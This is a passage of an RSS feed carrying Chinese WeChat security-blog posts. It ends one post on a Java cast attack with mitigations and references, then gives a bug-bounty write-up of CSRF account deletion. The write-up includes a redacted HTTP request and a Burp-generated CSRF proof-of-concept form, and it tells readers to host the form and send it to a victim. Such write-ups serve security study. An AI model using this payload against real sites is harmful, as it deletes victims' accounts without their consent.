style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">网络层面：对暴露在公网的 Java 应用服务，在完成代码修复前限制访问来源，降低攻击面。</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p></li></ul><p style="text-align:center;" data-pm-slice="2 2 []"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=a4abe696&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRwmeKLz8lJyhmkGZZvL74blSzGJnaDfveibH8HDw2Aia49iccX0anuAm4KmyWibwOzr9iaCib6nia7YibcRlVhBYE9tkI0uzXXNCZQQJ2c%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1.Black Hat Asia 2026 议题：Cast Attack: A New Threat Posed by Ghost Bits in Java  作者：Xinyu Bai（@b1u3r / @iSafeBlue）、Zhihui Chen（@1ue1166323）、贡献者 Zongzheng Zheng（@chun_springX）</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2.<a href="https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv" target="_blank">https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv</a></span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">3.<a href="https://github.com/advisories/GHSA-gw42-f939-fhvm" target="_blank">https://github.com/advisories/GHSA-gw42-f939-fhvm</a></span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">4.<a href="https://spring.io/security/cve-2022-22965" target="_blank">https://spring.io/security/cve-2022-22965</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=94a40390&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499396%26idx%3D1%26sn%3D42f82893ad0bb6a9c4141fc432d2ff7c">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 29 Apr 2026 10:09:00 +0800</pubDate>
    </item>
    <item>
      <title>csrf删除用户</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499367&amp;idx=1&amp;sn=84d91eb8c3a1b7dd51fa922fad1f8db9</link>
      <description></description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-04-28 10:01</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=6f9a858a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRzGOLHWECT4AaE5WBkjwvXP5VGeERIpKH4T4otR5Oeo0uAvH1XAhzOojQT7SncayhzTalFicTmrRia6joLVZPPXaEfYeJSibKbdYo%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">csrf删除用户</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=9cc2e3b6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRwHAvGp5ibuHRA0SdKaa4YsI58gTiawOCviatF49rGuellF6Xs6nZwtjEUFz8ltTEKgXphJOlMLyWGh9FCcbyQ19LzB9rQQAXeNvQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">复现步骤：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1.进入“创建账户”页面</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2.点击你的个人资料（Profile）</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">3.你会看到“删除账户（DELETE ACCOUNT）”按钮</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">4.点击该按钮，并在输入框中输入 YES</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">5.确保你的 Burp Suite 已开启，然后点击删除账户按钮</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">请求示例：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">POST /users/deleteAccount HTTP/1.1</span><span leaf=""><br/></span><span leaf="">Host: ██████</span><span leaf=""><br/></span><span leaf="">Cookie: _ga=...; session=...; session.sig=...</span><span leaf=""><br/></span><span leaf="">User-Agent: Mozilla/5.0 ...</span><span leaf=""><br/></span><span leaf="">Accept: */*</span><span leaf=""><br/></span><span leaf="">X-Requested-With: XMLHttpRequest</span><span leaf=""><br/></span><span leaf="">Origin: <a href="https://███████" target="_blank">https://███████</a></span><span leaf=""><br/></span><span leaf="">Referer: <a href="https://█████/users/deleteAccount" target="_blank">https://█████/users/deleteAccount</a></span><span leaf=""><br/></span><span leaf="">Content-Length: 0</span><span leaf=""><br/></span><span leaf="">Connection: close</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">利用方法：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">1.捕获该请求</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2.右键 → Engagement Tools → Generate CSRF PoC（生成 CSRF 攻击代码）</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">生成的示例代码如下：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">&lt;html&gt;</span><span leaf=""><br/></span><span leaf="">  &lt;!-- CSRF PoC - 由 Burp Suite Professional 生成 --&gt;</span><span leaf=""><br/></span><span leaf="">  &lt;body&gt;</span><span leaf=""><br/></span><span leaf="">    &lt;script&gt;history.pushState(</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#39;&#39;</span></span><span leaf="">, </span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#39;&#39;</span></span><span leaf="">, </span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#39;/&#39;</span></span><span leaf="">)&lt;/script&gt;</span><span leaf=""><br/></span><span leaf="">    &lt;form action=</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;<a href="https://████/users/deleteAccount" target="_blank">https://████/users/deleteAccount</a>&#34;</span></span><span leaf=""> method=</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;POST&#34;</span></span><span leaf="">&gt;</span><span leaf=""><br/></span><span leaf="">      &lt;input </span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">type</span></span><span leaf="">=</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;submit&#34;</span></span><span leaf=""> value=</span><span style="box-sizing: border-box;color: rgb(152, 195, 121);cursor: pointer;line-height: 26px;"><span leaf="">&#34;提交请求&#34;</span></span><span leaf=""> /&gt;</span><span leaf=""><br/></span><span leaf="">    &lt;/form&gt;</span><span leaf=""><br/></span><span leaf="">  &lt;/body&gt;</span><span leaf=""><br/></span><span leaf="">&lt;/html&gt;</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击方式说明：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">将上述 HTML 代码部署到你的服务器，并将该页面发送给受害者。 一旦受害者打开该页面，其账户将被删除。</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 